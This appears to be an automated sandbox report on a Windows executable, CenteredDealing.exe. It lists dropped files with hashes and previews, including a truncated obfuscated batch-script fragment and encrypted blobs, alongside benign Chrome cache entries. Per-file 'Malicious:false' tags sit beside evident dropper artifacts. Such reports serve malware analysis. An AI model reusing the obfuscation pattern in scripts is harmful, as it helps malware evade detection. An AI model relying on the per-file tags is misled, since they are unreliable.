                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8665
                                                                                                                                                                                                                                                              Entropy (8bit):5.169016611437142
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:eJiwx1mmlzr2Dw6tLO+ZTgZlQ1ium+PFOshoIkBGR2As6vXYJy2Fq5D9ZRLwKFMM:Xwxkqr2npZTgZlQPFJN5s6v0yV2KFQVI
                                                                                                                                                                                                                                                              MD5:2D9D73D3DE18302F486606200FCC930B
                                                                                                                                                                                                                                                              SHA1:5DC9EBBF5A05C136543EB1F6F257E014C8C096FC
                                                                                                                                                                                                                                                              SHA-256:375342F340E7AF8561966BC5D796983E701F57BC593BF206F0829FC3B5C38273
                                                                                                                                                                                                                                                              SHA-512:9CFC78BF30EFAD89992F798F256EB2D0C9DF7C951EB001E873CCA74C1589C574F774BDD59C150A65D4248761294E0E99427354A7F3EB29EF8A785E6F6A0883DA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Set Whom=h..ZbpTo-Enhanced-Recognized-Expert-Bean-Stories-..SVCHarassment-Ivory-Executed-Sb-Replies-Taxi-Measurement-Supports-..lItGg-Valid-Term-Stands-Estates-Wayne-..RLCaused-Its-Character-Participate-Retro-Builds-Alan-..mdYSurgeons-Factor-Recruiting-Webmasters-Placed-..ELzCreate-Cell-Usc-..YJVegetables-Honda-Agency-Positive-Rain-..dFSecurities-Reply-Img-..oNFRMens-..Set Appear=9..NIxGba-Est-Belts-Database-Penalties-Expects-Ruth-Villa-..FepCheckout-..JSrAffect-Manga-Detection-Chronicles-Automatic-Annotation-Personal-..lJCVMs-Latina-Freeze-Jul-Cams-..sOGZCarrier-Performs-..qDZPrepaid-Prix-Tooth-German-Establish-..Set Specifics=v..fRVoyeur-Suites-..wVexContinuously-Fly-Arms-Align-..bAjjRays-Neighbor-Personal-Antarctica-Tire-..IkClay-Pal-Supplies-Nicole-Stage-Compromise-Swimming-Incoming-Advantages-..TkokUtility-Valve-Ultram-Driven-Tomorrow-Excerpt-..Set Automated=j..GzvApplication-..PoPoland-..IcParagraphs-Diana-Serbia-Tagged-Owners-Used-Kidney-Religion-Lt-..uoZjCharm-Controversy-Remix

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\State

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):62464
                                                                                                                                                                                                                                                              Entropy (8bit):6.0205593496694645
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:Acd0vtmgMbFuz08QuklMBNIimuzaAwusk:heAg0Fuz08XvBNbjaAtsk
                                                                                                                                                                                                                                                              MD5:5F40468878ED32692F7CFB615F905B03
                                                                                                                                                                                                                                                              SHA1:74C1FE8E6612B1B775FC28FA7E0FA0487996BCCF
                                                                                                                                                                                                                                                              SHA-256:55FB1FB9E690370BF2652A453C8A229B8DD812B64E78C18840B302FA79222009
                                                                                                                                                                                                                                                              SHA-512:1629509F7A56E3BAA21BC4FA8F8D1884703FA897632BB1A4652BC725566D3309E88A4B7EC9D34DCD1D39FCA2F08BCA12F1780AF317380837480E348B1E346A69
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:OJ.(...xcJ.j...@OJ......cJ.a....NJ......cJ.P....NJ......cJ......cJ.Q....NJ......cJ.R....OJ.-....cJ.r....OJ.1....cJ.x....PJ.:....cJ......NJ.....8PJ.?....cJ......cJ.S....OJ.2....dJ.y...hOJ.%....dJ.g...`OJ.$....dJ.f...$dJ......OJ.+...0dJ.m...<dJ.....(PJ.=...HdJ......PJ.;...TdJ......OJ.0...`dJ.....ldJ.w...xdJ.u....dJ.U....NJ......dJ......dJ.T....dJ......NJ......dJ......OJ.6....dJ.~....NJ......dJ.V....NJ......dJ.W....dJ......dJ......eJ......eJ......NJ..... eJ.X....OJ.....,eJ.Y... PJ.<...8eJ.....DeJ.....PeJ.v...\eJ......OJ.....heJ.[...POJ."...teJ.d....eJ......eJ......eJ......eJ......eJ......eJ......OJ......eJ.\...8XJ......eJ......fJ......fJ.....4fJ..... OJ.....LfJ.....XfJ.]....OJ.3...dfJ.z...@PJ.@...pfJ......PJ.8....fJ......PJ.9....fJ.....(OJ......fJ.^....fJ.n...0OJ......fJ._....OJ.5....fJ.|....GJ. ....fJ.b...8OJ......fJ.`....OJ.4....fJ......fJ.{...xOJ.'....gJ.i....gJ.o...(gJ.....8gJ.....HgJ.....TgJ.....`gJ.....lgJ.....xgJ.F....gJ.p...a.f.-.z.a...a.r.-.a.e...a.r.-.b.h...a.r.-.d.z...a.r.-.e.g

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Vienna

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):68608
                                                                                                                                                                                                                                                              Entropy (8bit):7.997404908491138
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:n6PJG4PTW5bmpzlGIM4Woo2j3qW3Qgb4pL9Jd+96aUVUiLSP/5Fi:nUJP6lIlGN4Tgg0pLbd+9rUVUi2PW
                                                                                                                                                                                                                                                              MD5:63C01C6583C814079EFC34F9F2E7768E
                                                                                                                                                                                                                                                              SHA1:F13EF6330D780524903FD229D4F8D3E43AB2FDDA
                                                                                                                                                                                                                                                              SHA-256:76EEF7A207D472148A334A431BA20A8818D92457BB658E990E9B32CDF6489E0B
                                                                                                                                                                                                                                                              SHA-512:4E9D93822994F97D370FE93A23845B864041F0A2AE5675376898A4F0F87C7AA4A316CCD9ECCF1184EF67D09495A36C1263A54DADFF7482D51EFCF49ACEFD5EBF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..I.I. ..R.._F$?.}gt.P..&...}0D.!.=..P.....K...N<..>%l...{0..@..>...vKt.....d..n.C.d....t.B....L.=.Z.D.WpV.....^.6\.v........N:..'....}...5..i;Bv.]..A6.`....!..4._..8...iq}. +w.(..3....`..j5Ss.].b.M.....v......?..Dn.=..u...d~r.zP.-om.,...S.Y.....no...N.....M..a?....YA>a...TR....-...V n)d......`...,0:KS..o..Wp..V.i..=0.....\.......z..w...}*.........O..=f.M...[{).{....yw%...e...HIR.[...w..=".]/&.[V-1.*.Y....0..1.. D...._an.4....h\..5..-7...K.).|....Q:J0..d.$.W..........>...E....H."..w.#y..L.k.q.b.zn.~.......lv.p...&2*.s....6....U.....h.......+.u....0.........J...Q..-`]\.n...g.....$.v$........S.$.....\....(..-.QC..1,.?..f.B.l.`....J?Q...6c...iK.`......m.N...+.S ...iL.6.=...~I!....*<b..O...XK.bG..bd..."...f&.S.d.........3......t?:rl@...0...{z..<H.....7.7./..).^a......o../O5...m.>.T..^....(9D.z...._..y.XVv.... Xf&...%.......8E.....@^-./.S....I...S..1....y.Ae=../..A......M.......g.j.=KG.P..Ux......Z.....$x.C_ .A.....C...W.8..%2.....$G."<O.D.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Winston

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):82944
                                                                                                                                                                                                                                                              Entropy (8bit):7.997588151658238
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:9XuiAOhllOqx+GFt4A4pIhr9W4qHJNm+18j77Xx0qSak0Iq+0x:ciAO/lTUGD4A2IFo4+zm+1OO3v0XFx
                                                                                                                                                                                                                                                              MD5:C14496DA77D543FC678FA04A1E9AD51A
                                                                                                                                                                                                                                                              SHA1:99D654B892E2DE0184E5C007B48B764744DE7C76
                                                                                                                                                                                                                                                              SHA-256:D3A8D87393D6B38FA435FB90BFB3D31B4E4103D52D19855FC883BA594A093BCC
                                                                                                                                                                                                                                                              SHA-512:B21500A88761C2C9E7A9E932AD8DBC50E1DB65D40E8AFBFF4BAEAC1A6709811A1BE49FBF0EEF6AD8DF085B1955B77AEC04F041BD7252550D96480F95DD803DBA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:...S..+....F..v^.....?p[..Y..o..4..o..{S.E.c.q.5..&..S.~...<...b. .y...~[5.e1w2Z+....@.c.7k.v.a.iLygK../.tv......~...1..-.R...9...M.aD.....TJ...4..15@c,.7Jsc!=.....[jP..3w..e..zJ*... .,....v-..o.... .^5..Wz.Ct..+.M."..6.......#TI....c..Q..0.v.-.A..9...,..B...i.3<.>......j+_.Vp..1jN..,.I..Z`.......~)..%"UF..l...0.Q.....Z...f.......N.\..$...Q..W.?.6.p&.....Q...o...!._u:....;4K.....+.j..A..T.b.rEuN+.Gv...r}L....W.bO.^P...z......"....>....a.....p.4.....5r...........-.)S..Yp8.6..i...LC{.*..''...E;N...Y...9....D .B.....,G......>C..J......2.I.!....E.t.t.CV...o.$so.......'...0.M."?e.........p..b..Oc.^W..c.^C...n.....;........V..D..aDX.1 .T..E?X...y..\<.....I....\|.....D$...a.3w.-...2.....bG.l..(..y...._...{.y.T....a.D_....f)..!....'.N)..i.|......V.v.QR.."..\6.....*C..g..g4..9..6.la1.5.\W...:p..kF.iZ.......x..q.'...r.Mj..c.".,......f.(.[...._........m.d(...c.z8..}.k...b.#.;.yK..m..K.O.R...pg.a4...:.....'.R M.....P.~X&.,....P.. ...IE...G#.

                                                                                                                                                                                                                                                              Chrome Cache Entry: 100

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                              Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                              MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                              SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                              SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                              SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                              Chrome Cache Entry: 94

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (825)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):830
                                                                                                                                                                                                                                                              Entropy (8bit):5.190025959744097
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:SGMMtcIOe/tmTCOGBHslgT9lCuABAT/WdquoB7HHHHHHHYqmffffffo:ZMLIOe/tmOFKlgZ01BAruSEqmffffffo
                                                                                                                                                                                                                                                              MD5:D8C0313331A218B5EA8AA99BD0A84904
                                                                                                                                                                                                                                                              SHA1:B6CDCCA9619BA53006A25A04EF93D0DF0B82E92C
                                                                                                                                                                                                                                                              SHA-256:353A8DA037F0FE8CBB25431A2EB1F460035181FAE1DBF1B0B0C6550D0EB26E07
                                                                                                                                                                                                                                                              SHA-512:73CEF967EEFB5973985FF09E65E324B2E926CFC167375655FE00F293D69900040768B07222512E29992D6B5AB83C8E87C0B35D8B024E11E3EC0B2F1E25396A87
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                              Preview:)]}'.["",["norwegian cruise ship man overboard","vexbolts tiktok live follower count","polar vortex weather forecast","ripple xrp","buffalo bills patriots","spacex rocket launch today","samsung galaxy s25 ultra camera leak","peach drop"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":4059414775353948137,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                              Chrome Cache Entry: 95

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):117446
                                                                                                                                                                                                                                                              Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                              MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                              SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                              SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                              SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                              Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                              Chrome Cache Entry: 96

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                              Chrome Cache Entry: 97

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):132739
                                                                                                                                                                                                                                                              Entropy (8bit):5.436712439712313
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:f5kJQ7O4N5dTm+syHEt4W3XdQ4Q6SuSr/nUW2i6o:fwQ7HTt/sHdQ4Q6SDfUW8o
                                                                                                                                                                                                                                                              MD5:04DCAB9CC34C4B26F7E98622DCDEA806
                                                                                                                                                                                                                                                              SHA1:8FE44607E3C73E2F3CFABBAF943C524AF7D9F019
                                                                                                                                                                                                                                                              SHA-256:C74065A2A94D975A4DAA0224959E92C02B55EB39E258F7E9482CF6092F2D96DA
                                                                                                                                                                                                                                                              SHA-512:F1C01423B686AD80433053E2BEB43B2FAB09DDE169F9E8316E82A3201A270487F6DDEB897E79B13CA43E72023C7E6B02B146F1435483968C23B79D998AE8347F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                              Chrome Cache Entry: 98

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):175897
                                                                                                                                                                                                                                                              Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                              MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                              SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                              SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                              SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                              Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                              Chrome Cache Entry: 99

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):5162
                                                                                                                                                                                                                                                              Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                              MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                              SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                              SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                              SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                              Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.958215914632877
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:CenteredDealing.exe
                                                                                                                                                                                                                                                              File size:1'203'969 bytes
                                                                                                                                                                                                                                                              MD5:228e734f246564bb255b68d51bd6d31e
                                                                                                                                                                                                                                                              SHA1:13a36ae7bd290f4d7aba808d4435eb04008d3ac8
                                                                                                                                                                                                                                                              SHA256:7174de5abf7299d3c6ab5460d57ff110be491dc47325c24465281200852f0f9a
                                                                                                                                                                                                                                                              SHA512:bab72f4df67275da22a5fdfbf43eb55140dd6a68a025c263d12d30df8509b0d54c5b5388e8c49abeb0295c5fb5c8dae20f087f6230a6e214877765fef4e1c8b9
                                                                                                                                                                                                                                                              SSDEEP:24576:iE8W1Aw4BDEsIDdr7Bigm1Vm5Obojw0Z4FIRuYcT9:PZB4HmSgm1A5bx3RuYI
